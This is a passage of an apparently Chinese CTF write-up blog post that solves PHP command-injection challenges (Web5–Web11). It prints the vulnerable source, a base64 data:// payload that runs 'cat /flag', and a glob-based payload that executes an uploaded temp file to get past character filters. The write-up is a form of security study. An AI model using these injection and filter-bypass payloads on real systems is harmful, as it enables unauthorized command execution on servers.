class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></div></figure>
<p>这是Web5的变形，使用Web5的data协议，GET</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;49.232.149.138:10022&#x2F;?c&#x3D;data:&#x2F;&#x2F;text&#x2F;plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJ2NhdCAvZmxhZycpOwo&#x3D;</span><br></pre></td></tr></table></div></figure>
<p>这里遇到一个坑，再站长工具使用base64加密时，他会先将你的输入进行转义后再base64，造成错误</p>

        <h1 id="system"   >
          <a href="#system" class="heading-link"><i class="fas fa-link"></i></a>system()</h1>
      
        <h2 id="Web8"   >
          <a href="#Web8" class="heading-link"><i class="fas fa-link"></i></a>Web8</h2>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"> <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    system(<span class="variable">$c</span>.<span class="string">&quot; &gt;/dev/null 2&gt;&amp;1&quot;</span>);</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125; </span><br></pre></td></tr></table></div></figure>
<p>首先%00截断，回显错误</p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Warning: system(): NULL byte detected. Possible attack in &#x2F;var&#x2F;www&#x2F;html&#x2F;index.php on line 5</span><br></pre></td></tr></table></div></figure>
<p>然后尝试短路或，回显flag</p>

        <h2 id="Web10"   >
          <a href="#Web10" class="heading-link"><i class="fas fa-link"></i></a>Web10</h2>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|[a-z]|[0-9]|\\$|\(|\&#123;|\&#x27;|\&quot;|\`|\%|\x09|\x26|\&gt;|\&lt;/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>找到答案，<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_54515836/article/details/113305690%EF%BC%8C%E6%91%98%E6%8A%84%E5%A6%82%E4%B8%8B" >https://blog.csdn.net/weixin_54515836/article/details/113305690，摘抄如下</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<figure class="highlight plain"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">#!&#x2F;bin&#x2F;sh</span><br><span class="line">ls</span><br><span class="line">写入到1.php，form-data上传。</span><br><span class="line"></span><br><span class="line">payload构造如下：</span><br><span class="line">用. file执行文件，是不需要file有x权限的。所以，如果目标服务器上有一个我们可控的文件，就可以利用.执行它。</span><br><span class="line">我们可以发送一个上传文件的POST包，此时PHP会将我们上传的文件保存在临时文件夹下，php的上传实际上是接受multipart&#x2F;form-data然后将它保存在临时文件中，php.ini中设置的upload_tmp_dir就是这个临时文件的保存目录。</span><br><span class="line">php接收到上传的POST请求，就会保存一个临时文件，且命名规则一直是&#x2F;tmp&#x2F;phpXXXXXX，文件名最后6个字符是随机的大小写字母。(可参考后面总结中颖奇’blog，里面有详细说明)</span><br><span class="line"></span><br><span class="line">Linux下的glob通配符</span><br><span class="line">	*可以代替0个及以上任意字符</span><br><span class="line">	?可以代表1个任意字符</span><br><span class="line">那么，&#x2F;tmp&#x2F;phpXXXXXX就可以表示为&#x2F;*&#x2F;?????????或&#x2F;???&#x2F;?????????。但是要注意通配符匹配到的文件很多。</span><br><span class="line">glob支持用[^x]的方法来构造“这个位置不是字符x”</span><br><span class="line"></span><br><span class="line">所以可以将一些特殊字符给排除，例如：</span><br><span class="line">php_333  -&gt; ???[^_ ]???,即可排除php_333。</span><br><span class="line">glob支持利用[0-9]来表示一个范围。可见大写字母位于@与[之间，可以利用[@-[]来表示大写字母，通过这一步即可排除其他干扰选项。</span><br><span class="line"></span><br><span class="line">最后的payload</span><br><span class="line">?c&#x3D;.+&#x2F;???&#x2F;????????[@-[]</span><br></pre></td></tr></table></div></figure>
<p>值得注意的是，这里只能用form-data上传文件，直接Binary是不可以的。</p>
<p>另外，这篇文章也不错：<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html" >https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>

        <h2 id="Web11"   >
          <a href="#Web11" class="heading-link"><i class="fas fa-link"></i></a>Web11</h2>
      <figure class="highlight php"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>]))&#123;</span><br><span class="line">    <span class="variable">$c</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;c&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(!preg_match(<span class="string">&quot;/\;|[a-z]|\`|\%|\x09|\x26|\&gt;|\&lt;/i&quot;</span>, <span class="variable">$c</span>))&#123;</span><br><span class="line">        system(<span class="variable">$c</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>是上一道题的弱化版，可能排题顺序出现了问题，按上一道题的方法直接获得flag</p>
<p>值得注意的是，上传是有一定概率触发的，原因可能是服务器符合条件的文件不止一个，多试几次就可以</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="https://blog.flame8.xyz">WhiteFlame</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="https://blog.flame8.xyz/2021/01/28/WebGame/">https://blog.flame8.xyz/2021/01/28/WebGame/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://blog.flame8.xyz/tags/Exercise/">Exercise</a></span></div><nav class="post-paginator paginator"><div class="paginator-prev"><a class="paginator-prev__link" href="/2021/01/30/VueHoles/"><span class="paginator-prev__icon"><i class="fas fa-angle-left"></i></span><span class="paginator-prev__text">Vue 开发踩过的坑</span></a></div><div class="paginator-next"><a class="paginator-next__link" href="/2021/01/24/DJBCTF02/"><span class="paginator-prev__text">DJBCTF02 1道MISC 1道WEB</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#eval"><span class="toc-number">1.</span> <span class="toc-text">
          eval()</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web1"><span class="toc-number">1.1.</span> <span class="toc-text">
          Web1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web2"><span class="toc-number">1.2.</span> <span class="toc-text">
          Web2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web3"><span class="toc-number">1.3.</span> <span class="toc-text">
          Web3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web4"><span class="toc-number">1.4.</span> <span class="toc-text">
          Web4</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web7"><span class="toc-number">1.5.</span> <span class="toc-text">
          Web7</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web9"><span class="toc-number">1.6.</span> <span class="toc-text">
          Web9</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%AD%A4%E6%B3%95%E5%A4%B1%E8%B4%A5%EF%BC%8C%E5%B0%9D%E8%AF%95phpinfo-%EF%BC%9A"><span class="toc-number">1.6.0.0.1.</span> <span class="toc-text">
          此法失败，尝试phpinfo()：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E6%AD%A4%E6%B3%95%E6%88%90%E5%8A%9F%EF%BC%8C%E5%B0%9D%E8%AF%95phpinfo"><span class="toc-number">1.6.0.0.2.</span> <span class="toc-text">
          此法成功，尝试phpinfo():</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#include"><span class="toc-number">2.</span> <span class="toc-text">
          include()</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web5"><span class="toc-number">2.1.</span> <span class="toc-text">
          Web5</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#file"><span class="toc-number">2.1.0.0.1.</span> <span class="toc-text">
          file:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#php"><span class="toc-number">2.1.0.0.2.</span> <span class="toc-text">
          php:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#zip-bzip2-zlib"><span class="toc-number">2.1.0.0.3.</span> <span class="toc-text">
          zip:&#x2F;&#x2F;, bzip2:&#x2F;&#x2F;, zlib:&#x2F;&#x2F;</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#data"><span class="toc-number">2.1.0.0.4.</span> <span class="toc-text">
          data:&#x2F;&#x2F;</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web6"><span class="toc-number">2.2.</span> <span class="toc-text">
          Web6</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#system"><span class="toc-number">3.</span> <span class="toc-text">
          system()</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Web8"><span class="toc-number">3.1.</span> <span class="toc-text">
          Web8</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web10"><span class="toc-number">3.2.</span> <span class="toc-text">
          Web10</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Web11"><span class="toc-number">3.3.</span> <span class="toc-text">
          Web11</span></a></li></ol></li></ol></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/stun-logo.svg" alt="avatar"></div><p class="sidebar-ov-author__text">hello world</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">9</div><div class="sidebar-ov-state-item__name">归档</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2021</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>WhiteFlame</span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v5.3.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.6.1</span></div><div><!-- Cloudflare Web Analytics --><script defer src='https://static.cloudflareinsights.com/beacon.min.js' data-cf-beacon={'token': '142237f73d2f4a7fab477d3e767ff8dc'}></script><!-- End Cloudflare Web Analytics --></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.6.1"></script><script src="/js/stun-boot.js?v=2.6.1"></script><script src="/js/scroll.js?v=2.6.1"></script><script src="/js/header.js?v=2.6.1"></script><script src="/js/sidebar.js?v=2.6.1"></script></body></html>